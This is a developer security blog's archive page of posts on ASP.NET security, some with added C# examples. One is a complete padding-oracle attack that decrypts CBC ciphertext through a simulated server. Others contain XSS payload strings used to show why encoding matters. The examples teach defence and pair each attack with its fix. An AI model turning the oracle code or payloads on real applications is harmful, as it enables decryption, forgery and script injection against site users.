security

There are 26 entries for the tag security
So what went wrong with Citibank? (And how to fix it)

Now my DevSecNerdRage™ has calmed down I thought I might guess at what went wrong with Citibank and how you, as a developer, can avoid making the same mistake. From reports in the New York Times it appears the attackers had a valid login and password for a Citibank credit card site, and once in they changed the account number in the URL. This is a textbook example of an Insecure Direct Object Reference (IDOR): the application checks that you are logged in, but never checks that the object you asked for belongs to you. I can imagine the code / configuration doing something like this (all code in this post is pseudocode):

if (IsAuthenticated)
{
    LoadAccount(Request.QueryString["accountNumber"]);
}

It's not the first time...
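As an added example (not code from the original post, and not Citibank's code) here is the vulnerable pattern next to the fix, written as a self-contained C# console program so it runs without ASP.NET. The account store, account numbers and user names are constructed for illustration, and LoadAccountInsecure / LoadAccountSecure are hypothetical names.

```csharp
using System;
using System.Collections.Generic;

// Added example: an in-memory account store standing in for the data layer,
// and a "current user" standing in for the authenticated principal.
class Account
{
    public string Number { get; set; }
    public string OwnerUserId { get; set; }
    public decimal Balance { get; set; }
}

static class AccountStore
{
    // Constructed sample data: two customers, one account each.
    static readonly Dictionary<string, Account> accounts = new Dictionary<string, Account>
    {
        ["1001"] = new Account { Number = "1001", OwnerUserId = "alice", Balance = 250m },
        ["1002"] = new Account { Number = "1002", OwnerUserId = "bob", Balance = 9000m },
    };

    // The vulnerable pattern: "logged in" is treated as "allowed to see anything",
    // so whatever accountNumber the URL carries is loaded and shown.
    public static Account LoadAccountInsecure(bool isAuthenticated, string accountNumber)
    {
        if (!isAuthenticated) throw new UnauthorizedAccessException("not logged in");
        return accounts.TryGetValue(accountNumber, out var a) ? a : null;
    }

    // The fix: authorise the requested object against the logged-in user, not just the session.
    // "No such account" and "not your account" get the same answer so existence is not leaked.
    public static Account LoadAccountSecure(string currentUserId, string accountNumber)
    {
        if (string.IsNullOrEmpty(currentUserId)) throw new UnauthorizedAccessException("not logged in");
        if (!accounts.TryGetValue(accountNumber, out var a) || a.OwnerUserId != currentUserId)
            return null;
        return a;
    }
}

static class Program
{
    static void Main()
    {
        // Alice logs in with her own credentials, then edits the URL to ask for account 1002 (Bob's).
        var leaked = AccountStore.LoadAccountInsecure(isAuthenticated: true, accountNumber: "1002");
        Console.WriteLine($"insecure: owner={leaked.OwnerUserId} balance={leaked.Balance}"); // Bob's data

        var denied = AccountStore.LoadAccountSecure("alice", "1002");
        Console.WriteLine(denied == null ? "secure: denied" : "secure: BUG, authorisation missing");

        var own = AccountStore.LoadAccountSecure("alice", "1001");
        Console.WriteLine($"secure: own account {own.Number} balance={own.Balance}");
    }
}
```

The durable form of the fix is to push the ownership predicate into the query itself (load the account by owner and number, not by number alone) so that a page author cannot forget the check; the per-page `if` above is the minimum, not the ideal.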

posted @ Saturday, June 18, 2011 12:39 PM | Feedback (1)

Has CitiBank scared you? Want to learn more about securing ASP.NET?

Last month I was rather pleased to welcome Troy Hunt into my little band of Developer Security MVPs. He’s been doing a bunch of blog posts on the OWASP Top 10 list for ASP.NET developers. Check them out; he’s almost finished.

posted @ Tuesday, June 14, 2011 10:41 AM | Feedback (0)

On the ASP.NET “POET” Vulnerability

So late Friday two security researchers presented a side channel attack on the encryption and validation methods used on ViewState. Side channel attacks work by analysing the responses from a cryptosystem to infer information; here the attacker sends modified ciphertext and watches whether the server reports an invalid padding error, and that one bit per request is enough to decrypt the ciphertext and to encrypt data of the attacker's choosing without ever knowing the machine key, so they can craft ViewState the application will accept, possibly compromising the web application. Now that the researchers have presented, their work is under investigation; MSRC have an official advisory (Microsoft Security Advisory 2416728) along with further information. ScottGu has also posted more details including a workaround...
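As an added example (not the researchers' tool and not Microsoft's code) the following C# console program shows the mechanism: a hypothetical server decrypts AES-CBC with PKCS#7 padding and reveals only whether the padding was valid, and an attacker with nothing but that answer recovers the plaintext one block at a time. The key, IV and the plaintext string are constructed for the demonstration, and PaddingOracleServer, Attacker and RecoverBlock are hypothetical names.

```csharp
using System;
using System.Security.Cryptography;
using System.Text;

// Added example: the side channel is the distinguishable "padding invalid" error.
sealed class PaddingOracleServer
{
    private readonly byte[] key;
    public PaddingOracleServer(byte[] key) { this.key = key; }

    private Aes NewAes(byte[] iv)
    {
        var aes = Aes.Create();
        aes.Key = key; aes.IV = iv;
        aes.Mode = CipherMode.CBC; aes.Padding = PaddingMode.PKCS7;
        return aes;
    }

    public byte[] Encrypt(byte[] iv, byte[] plaintext)
    {
        using (var aes = NewAes(iv))
        using (var enc = aes.CreateEncryptor())
            return enc.TransformFinalBlock(plaintext, 0, plaintext.Length);
    }

    // What the application leaks: true = decrypted cleanly, false = bad padding error page.
    public bool PaddingIsValid(byte[] iv, byte[] ciphertext)
    {
        using (var aes = NewAes(iv))
        using (var dec = aes.CreateDecryptor())
        {
            try { dec.TransformFinalBlock(ciphertext, 0, ciphertext.Length); return true; }
            catch (CryptographicException) { return false; }
        }
    }
}

static class Attacker
{
    // Recovers one 16-byte plaintext block from the block that precedes it in the
    // ciphertext (the IV for the first block) and the padding oracle.
    public static byte[] RecoverBlock(byte[] previous, byte[] target, Func<byte[], byte[], bool> oracle)
    {
        const int n = 16;
        var intermediate = new byte[n]; // block-cipher decryption of target, before the CBC XOR
        var forged = new byte[n];       // attacker-controlled "previous block" sent as the IV
        for (int pos = n - 1; pos >= 0; pos--)
        {
            int pad = n - pos;
            // Bytes to the right are already known: set them so they decrypt to the pad value.
            for (int k = pos + 1; k < n; k++) forged[k] = (byte)(intermediate[k] ^ pad);
            bool found = false;
            for (int guess = 0; guess < 256 && !found; guess++)
            {
                forged[pos] = (byte)guess;
                if (!oracle(forged, target)) continue;
                if (pos == n - 1)
                {
                    // Edge case: the last byte may validate as 0x02 0x02 (or longer) by chance.
                    // Disturb the byte to its left; a genuine 0x01 padding still validates.
                    forged[pos - 1] ^= 0xFF;
                    bool stillValid = oracle(forged, target);
                    forged[pos - 1] ^= 0xFF;
                    if (!stillValid) continue;
                }
                intermediate[pos] = (byte)(guess ^ pad);
                found = true;
            }
            if (!found) throw new InvalidOperationException("oracle never reported valid padding");
        }
        var plain = new byte[n];
        for (int i = 0; i < n; i++) plain[i] = (byte)(intermediate[i] ^ previous[i]);
        return plain;
    }
}

static class Program
{
    static void Main()
    {
        // Constructed secret: the attacker sees the ciphertext and the IV, never the key.
        var key = new byte[16]; var iv = new byte[16];
        using (var rng = RandomNumberGenerator.Create()) { rng.GetBytes(key); rng.GetBytes(iv); }
        var server = new PaddingOracleServer(key);
        var ct = server.Encrypt(iv, Encoding.ASCII.GetBytes("__VIEWSTATE=secret!!")); // 20 bytes, 2 blocks

        var recovered = new byte[ct.Length];
        byte[] prev = iv;
        for (int b = 0; b < ct.Length / 16; b++)
        {
            var block = new byte[16]; Array.Copy(ct, b * 16, block, 0, 16);
            Array.Copy(Attacker.RecoverBlock(prev, block, server.PaddingIsValid), 0, recovered, b * 16, 16);
            prev = block;
        }
        int padLen = recovered[recovered.Length - 1]; // the PKCS#7 padding comes back too
        Console.WriteLine(Encoding.ASCII.GetString(recovered, 0, recovered.Length - padLen));
    }
}
```

The attack costs at most 256 requests per byte and needs no cryptanalysis of AES at all; the defence is to authenticate the ciphertext (a MAC over IV and ciphertext, verified before any decryption is attempted) and to make every failure, padding or otherwise, produce the same response in the same time.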

posted @ Monday, September 20, 2010 6:32 AM

Beginning ASP.NET Security is now available in the US

You can order it from Amazon and it’s in stock. Even better, because I had an American editor, you’ll find a severe lack of the letter U in words and the abomination that is the Oxford comma scattered throughout. In other news, despite the continuous hobbit comments, Alex Mackey, author of Introducing .NET 4.0 with VS2010 (Amazon US / Amazon UK), has reviewed the book and said nice things, all without payment!

posted @ Tuesday, March 02, 2010 7:45 PM | Feedback (0)

On the importance of checking inputs

So by now we should all know that taking user input in a web page and spitting it back out again without encoding it is a bad idea and leads to cross-site scripting (XSS). Of course some web sites don’t bother, which leads to hilarity such as the Toyota Ireland recall page, as demonstrated here. All the HTML encoding in the world won’t save you if you’re not constraining and validating your input: encoding neutralises markup, but it does nothing about a value that is dangerous in its own right, such as a URL with a script scheme (although Toyota aren’t even bothering with encoding – you can embed script in the r parameter for that page).
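As an added example (not code from the original post, and nothing to do with the Toyota page's actual implementation) the C# program below shows the two halves side by side: context-specific output encoding with the framework's HttpUtility, and allow-list validation for a value that encoding alone cannot make safe. The parameter name r comes from the post; that it holds a "return to" URL is an assumption made for the example, as are the SafeOutput class and its method names. It needs a reference to System.Web (part of the shared framework on .NET Core 2.0 and later).

```csharp
using System;
using System.Text.RegularExpressions;
using System.Web;

// Added example: encode for the context you are writing into, and validate
// values whose meaning (here, a URL) makes encoding beside the point.
static class SafeOutput
{
    // Encoding only. The attribute is well-formed HTML, but the link still runs script
    // when clicked because nothing in "javascript:..." needs encoding.
    public static string HrefEncodedOnly(string r) =>
        "<a href=\"" + HttpUtility.HtmlAttributeEncode(r) + "\">back</a>";

    // Allow-list: a local, path-style URL with an optional simple query string.
    // Anything with a scheme, an authority ("//host") or odd characters is rejected, not cleaned.
    static readonly Regex LocalPath = new Regex(@"\A/[A-Za-z0-9/_\-.]*(\?[A-Za-z0-9=&_\-.%]*)?\z");
    public static bool IsLocalPath(string r) =>
        r != null && !r.StartsWith("//") && LocalPath.IsMatch(r);

    // Validate first, then encode for the attribute context.
    public static string HrefValidatedAndEncoded(string r)
    {
        if (!IsLocalPath(r)) r = "/"; // safe default; never echo the rejected value back
        return "<a href=\"" + HttpUtility.HtmlAttributeEncode(r) + "\">back</a>";
    }

    // The same untrusted value in three other contexts needs three different encoders.
    public static string InHtmlText(string v)    => "<p>" + HttpUtility.HtmlEncode(v) + "</p>";
    public static string InJsString(string v)    => "<script>var r = '" + HttpUtility.JavaScriptStringEncode(v) + "';</script>";
    public static string InQueryString(string v) => "/search?q=" + HttpUtility.UrlEncode(v);
}

static class Program
{
    static void Main()
    {
        // Constructed attacker input with no angle brackets: encoding leaves it untouched.
        string evil = "javascript:alert(document.cookie)";
        Console.WriteLine(SafeOutput.HrefEncodedOnly(evil));          // a live javascript: link
        Console.WriteLine(SafeOutput.HrefValidatedAndEncoded(evil));  // href="/"
        Console.WriteLine(SafeOutput.HrefValidatedAndEncoded("/account/summary?id=7"));

        // Constructed input that breaks out of a script block if dropped in raw.
        string breakout = "</script><script>alert(1)</script>";
        Console.WriteLine(SafeOutput.InHtmlText(breakout));    // &lt;/script&gt;... inert as text
        Console.WriteLine(SafeOutput.InJsString(breakout));    // \u003c/script\u003e... inert in JS
        Console.WriteLine(SafeOutput.InQueryString(breakout)); // %3c%2fscript%3e...
    }
}
```

Note the order: validation decides whether the value is acceptable at all, encoding decides how to write an acceptable value into a given context; doing either one alone leaves a hole.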

posted @ Sunday, February 07, 2010 12:29 PM | Feedback (4)

And the book cover is …

Last year Wrox switched from having happy, smiling, chin posing authors on their book covers to, well, to random images with a bit of red. So for those of you that have pre-ordered you’ll be happy to know that you won’t have me smiling out from your book shelf. Instead you’ll get an image which encapsulates my interest in exercise and sports. Errr, well, someone’s interest in exercise and sports. Never fear though, I am on the inside … Note for Americans – this image is from a game called football by the rest of the world. The...

posted @ Monday, January 04, 2010 6:00 AM | Feedback (1)

And we’re done. Beginning ASP.NET Security

So about an hour ago the last edits to the proof went off to the proof reader, which hopefully means, after a year, it’s all done. You may be pleased to learn that, as I’ve taken so long, it will be published using the new, better quality paper and will not have my mug shot on the cover. (On discovering this my smart-assed nephew said “That’s good, people won’t judge the book by its cover”.) The final details are as follows: Beginning ASP.NET Security, Wrox Press, ISBN: 978-0470743652, Pages:...

posted @ Tuesday, December 15, 2009 8:02 AM | Feedback (10)

Dublin bound – Epicenter Conference

At the end of the month I’ll be in Dublin delivering “Stop your website being stung” – a guide to the OWASP Top Ten project and how you can secure your ASP.NET site against them – at Epicenter. There are a few other MVPs speaking as well, including Craig Murphy, the Black Marble boys Richard Fennell and Robert Hogg, and that damned Jon “I’m going to answer everything on StackOverflow” Skeet. Two DDD Belfast speakers are reprising their topics: Alex Mackey is giving his standing-room-only session on VS2010 and Andrea Magnorsky is covering the Monorail MVC package. Tickets are...

posted @ Saturday, August 15, 2009 12:05 PM | Feedback (0)

ATL Vulnerability – recompile your Active Template Library based controls now.

Today saw Microsoft release an out-of-band update for Visual Studio correcting a vulnerability in the Active Template Library. Any control which has been compiled with previous versions of ATL may allow remote code execution; it must be recompiled against the fixed ATL and the corrected version distributed as soon as possible, since patching the machine alone does not fix a control already built with the flawed library. This vulnerability affects Visual Studio 2003, 2005 and 2008. Microsoft have a dedicated page on the problem on the Microsoft Security site. The Security Research and Defense blog also has an overview of the release along with a great list of further resources: MS09-034: Internet Explorer bulletin ...

posted @ Tuesday, July 28, 2009 6:55 PM | Feedback (0)

AntiXSS has gone RTM

AntiXSS, the open source encoding library from the Microsoft Security Tools folks, has gone live, and the binaries are available from the MS download centre. I’ve been recommending this for quite a while over the framework’s HttpUtility.HtmlEncode and UrlEncode simply because it offers more options (JavaScript, VBScript and XML encoding) and has a visible test suite – plus if something does go wrong it’ll be easier to patch quickly, rather than waiting for a patched version of the .NET framework. There’s also a runtime module which will try to encode on the fly in case you forget to … ...

posted @ Wednesday, July 15, 2009 11:59 AM | Feedback (0)

Vista Squad: OWASP Top 10 Security Vulnerabilities Video

I gave my OWASP presentation to Vista Squad last Wednesday, where Ian Smith kindly (?) videoed it. The other speaker for that evening dropped out, meaning the poor attendees had just me to listen to as I stretched it out to about 100 minutes. The length meant that the video is in two halves: Part 1 from Vista Squad on Vimeo, and Part 2 from Vista Squad on Vimeo. The presentation is the same one I gave at WebDD, so the slides and code are the same. The feedback on Twitter was amusing; ...

posted @ Saturday, June 20, 2009 9:02 AM | Feedback (5)

I’m presenting at WebDD

The UK .NET Community’s favourite redheaded step child Phil Winstanley just emailed me to say I’ve been picked to talk at WebDD. I’ll be presenting “P0wn3d! (Or how to redirect your friend's website to katyperry.com)”. This takes my OWASP Top Ten Web Vulnerabilities talk to five outings over the next couple of months:
WebDD09, 18 April 2009
DDD Scotland, 2 May 2009
VBug London, 26 May 2009
DevEvening Woking, 4 June 2009
Vista Squad London, 17 June...

posted @ Thursday, March 26, 2009 8:03 AM | Feedback (0)

The book cover, second draft

I was emailed the second draft of the book cover today, which makes it scarily real. But not half as scary as what Oliver did with it. Ah, the MVP community – we’re a tight bunch of nits …

posted @ Tuesday, March 10, 2009 6:47 PM | Feedback (4)

Strong passwords and lastpass.com

How many of you practice what you preach? Run as a non-administrative user? Use separate, strong passwords for all your internet accounts? I’ve been guilty of doing neither – I blame Visual Studio for not being able to run as a limited account, but not using strong passwords and individual usernames has been down to laziness and a bad memory. lastpass.com to the rescue. LastPass is a browser plugin and web site that replaces the “Remember username and password” functionality of Firefox and IE, on Windows, Mac and Linux (there’s even alpha support for IE 64-bit). This is nothing...

posted @ Sunday, March 08, 2009 2:45 PM | Feedback (2)

CAT.NET CTP Released

Following up on AntiXSS, Mark Curphey has also announced the first public release of CAT.NET. CAT.NET is a managed code static analysis tool for finding security vulnerabilities. It's exactly the same tool we use internally to scan all of our Line of Business (LOB) applications; it runs as a Visual Studio plug-in or as a stand-alone application. It was engineered by this group (CISG) and has been designed in partnership with the ACE Team and Microsoft Research. The ACE Team do thousands of code reviews for the internal line of business applications and for our external customers and have provided a...

posted @ Monday, December 15, 2008 10:18 AM | Feedback (0)

Announcing AntiCSRF for ASP.NET

As part of the book currently under way I cover Cross Site Request Forgery, a rather fun exploit that numerous web sites have been vulnerable to. In September of this year researchers from Princeton announced the discovery of four major web sites which were susceptible, including ING Direct, a vulnerability which would allow an attacker to transfer money between accounts. CSRF works via persistent authentication. When you log on to a web site an authentication cookie is left on your machine (or, if you're using HTTP Authentication, your browser remembers and sends the username and password with each request); the browser then attaches that credential to every request to the site, including ones another site tricked it into making. An...
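As an added example (not the AntiCSRF module's code, and not taken from the book) here is the standard countermeasure, a synchronizer token, as a self-contained C# console program: the server issues a random token tied to the session, embeds it in its own forms, and refuses any state-changing POST that does not carry it back. The cookie still rides along with a forged request; the token cannot, because the forging site never saw it. The Session class, the form dictionary and the Csrf class are hypothetical stand-ins for the session store and the request.

```csharp
using System;
using System.Collections.Generic;
using System.Security.Cryptography;

// Added example: a per-session synchronizer token for CSRF protection.
sealed class Session
{
    public string UserId;
    public string CsrfToken;
}

static class Csrf
{
    public const string FieldName = "__CsrfToken";

    // One unguessable token per session, created lazily from the CSPRNG.
    public static string IssueToken(Session session)
    {
        if (session.CsrfToken == null)
        {
            var bytes = new byte[32];
            using (var rng = RandomNumberGenerator.Create()) rng.GetBytes(bytes);
            session.CsrfToken = Convert.ToBase64String(bytes);
        }
        return session.CsrfToken;
    }

    // Rendered into forms served by the legitimate site; a third-party page cannot read it.
    public static string HiddenField(Session session) =>
        "<input type=\"hidden\" name=\"" + FieldName + "\" value=\"" + IssueToken(session) + "\" />";

    // Fixed-time comparison so response timing does not reveal how much of the token matched.
    static bool FixedTimeEquals(string a, string b)
    {
        if (a == null || b == null || a.Length != b.Length) return false;
        int diff = 0;
        for (int i = 0; i < a.Length; i++) diff |= a[i] ^ b[i];
        return diff == 0;
    }

    // Call this for every POST (or other state-changing request) before doing the work.
    public static bool IsValidPost(Session session, IDictionary<string, string> form)
    {
        string submitted;
        return session.CsrfToken != null
            && form.TryGetValue(FieldName, out submitted)
            && FixedTimeEquals(session.CsrfToken, submitted);
    }
}

static class Program
{
    static void Main()
    {
        var alice = new Session { UserId = "alice" }; // logged in; the auth cookie is assumed present
        Console.WriteLine(Csrf.HiddenField(alice));

        // Constructed forged request from an attacker's page: cookie sent automatically, no token.
        var forged = new Dictionary<string, string> { ["to"] = "attacker", ["amount"] = "1000" };
        Console.WriteLine("forged transfer accepted:  " + Csrf.IsValidPost(alice, forged));  // False

        // The same request submitted from the site's own form, which carried the hidden field.
        var genuine = new Dictionary<string, string>(forged) { [Csrf.FieldName] = alice.CsrfToken };
        Console.WriteLine("genuine transfer accepted: " + Csrf.IsValidPost(alice, genuine)); // True
    }
}
```

Two things to keep straight when wiring this into a real site: the check must cover every request that changes state, not just the ones you remembered (which is exactly why a module that hooks the pipeline is attractive), and GET must never change state, or the token is bypassed by a plain link or image tag.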

posted @ Sunday, December 14, 2008 1:47 AM | Feedback (15)

Get Safe Online Week

This week is Get Safe Online week; a campaign founded by the Government, HSBC, SOCA and Microsoft. The campaign site, http://www.getsafeonline.org/ is aimed at the "mum" user, people who don't know about the ins and outs of security; the people who are at risk the most. This year they're focusing on identity fraud; apparently research and survey information will be available. As the week progresses more information will appear on the site, written in non-technical language and presented in a way that everyday Internet users can understand. So if you don't want to try to explain phishing...

posted @ Monday, November 17, 2008 9:56 AM | Feedback (0)

An illustration of social engineering

Last night my Twitter feed started filling up with messages about Twitterank; in fact there are so many messages that it's currently in the top 10 trends for the day on tweetscans.com. Looking at the people in my feed who used it – a few MVPs, a bunch of Microsoft staffers and a couple of other technical folks – it looked interesting. Except, well, I'm paranoid. Twitterank is much like a Google PageRank for your Twitter account. Cool, just what we need, more ways to feel inadequate on the internet. The interesting part of it is...

posted @ Thursday, November 13, 2008 7:07 AM | Feedback (0)

Look ma! I'm an author.

Well; in a few months anyway. A month or so ago I saw a tweet flit past asking for someone who has ASP.NET security knowledge; someone pointed the user my way. I assumed it was someone just asking for advice, so I sent off something along the lines of "What do you need to know?". It turns out the recipient was part of Wrox Press and he was after knowledge, in the shape of a book. So after some pondering, and pointing out I thought it had been done to death, we both came up with, what...

posted @ Tuesday, September 16, 2008 6:33 PM | Feedback (9)

Patterns & Practices for Improving Web Services Security

Yesterday saw the release of the beta version of the P&P team’s WCF Security guide. The guide, Improving Web Services Security: Scenarios and Implementation Guidance for WCF, is the Microsoft recipe book for Windows Communication Foundation. It aims to show you how to build secure services using WCF and promises to be "a compendium of proven practices, product team recommendations, and insights from the field", including application scenarios and step-by-step how-tos. Best of all it’s free, published as a PDF for download. The chapters are: Security Fundamentals for Web Services; Threats and Countermeasures...

posted @ Thursday, June 05, 2008 11:55 AM | Feedback (1)

Security by insanity : Apple Password Guidelines.

From page 52 of the new Leopard security guidelines: "Enter a new password and verify it when prompted. This password can be up to eight characters. Do not use the capital letter “U” in an Open Firmware password." According to an Apple support doc (if you do, kiss booting your machine goodbye; darn, not the case): "If you used Open Firmware Password utility to create a password that contains the capital letter "U", your password will not be recognized during the startup process (when you try to access Startup Manager, for example)." Excuse me while I giggle insanely .......

posted @ Tuesday, June 03, 2008 3:17 PM | Feedback (4)

"On the Insecurity of Microsoft's Identity Metasystem Cardspace"

Hot on the heels of the OpenID phishing demonstration comes a proof of concept entitled "On the Insecurity of Microsoft’s Identity Metasystem Cardspace". Setting aside the valid concerns about DNS poisoning, the proof of concept relies on SSL certificates: it requires the user to install and trust a new root certificate. The assumption is that a user will blindly do this. I am not so sure, especially as both IE7 and Firefox will throw full-screen certificate errors before allowing the browser to proceed. The user would have to choose to proceed, install a new root...

posted @ Thursday, May 29, 2008 3:59 PM | Feedback (1)

DDD6; "Web Services; we don't need no stinking web server"

I received the email last night; I’m speaking at DDD again, this time on WCF in a presentation entitled “Web Services; we don’t need no stinking web server”. The abstract: Remoting is dead. Long live WCF. This session aims to cover the creation of web services with WCF, inside and outside of IIS, including one way and two way services, as well as contracts, faults, authentication, authorisation and security. I think I’ll try to sneak something CardSpace related in there *grin* As an added bonus I’m also sitting on the recruitment round table discussion sharing my personal thoughts on where candidates...

posted @ Tuesday, October 23, 2007 7:25 AM | Feedback (1)

Irish Microsoft Technology Conference

A while back the call went out for .NET speakers who would come to Ireland; and now the Irish Microsoft Technology Conference has finally been announced by Claire Dillon. Yes, I am speaking, giving my "Hacking Web Sites for Fun & Profit" talk (which doesn't appear to be as trendy as all the other topics, but Dominick Baier beat me to a CardSpace presentation!). I'm not sure this counts as an international engagement for me as I was born north of the border, but it does give me a birthday cake, as my birthday is the day after and...

posted @ Friday, May 18, 2007 10:30 PM | Feedback (2)

DDD #5 voting is open

You can now vote on sessions you want to see at the next Developer Day. It's rather funny to see an entire Security section manned by my colleague, Chris Seary, and myself; I should have submitted more than one session just to try to catch up with Chris. I hope to cover CardSpace, a talk I originally gave at WebDD, except this time I won't be up against ScottGu <g>. Richard Costall described the session from WebDD thus: I ended up being lured into a talk on CardSpace by Barry Dorrans. His session was described as the Overflow room for Scott's...

posted @ Saturday, April 28, 2007 6:26 PM | Feedback (0)

Scottish Developers Security Day

Last Thursday saw Chris Seary and myself presenting at the Microsoft offices in sunny (yes, really) Edinburgh for the Scottish Developers Group. Thanks must go to Craig and John for organising. I presented an updated (trendy white on black) "Hacking Websites for Fun & Profit", "Securing ASP.NET Websites and Applications" and "An Introduction to Windows CardSpace". An audience member (sorry, I didn't catch your name) asked me to put together some resource links on SQL injection, XSS and so on. Probably the best breakdown of SQL injection is Chris Anley's PDF, "Advanced SQL Injection In SQL Server Applications". The XSS FAQ is...

posted @ Monday, April 16, 2007 7:09 PM | Feedback (0)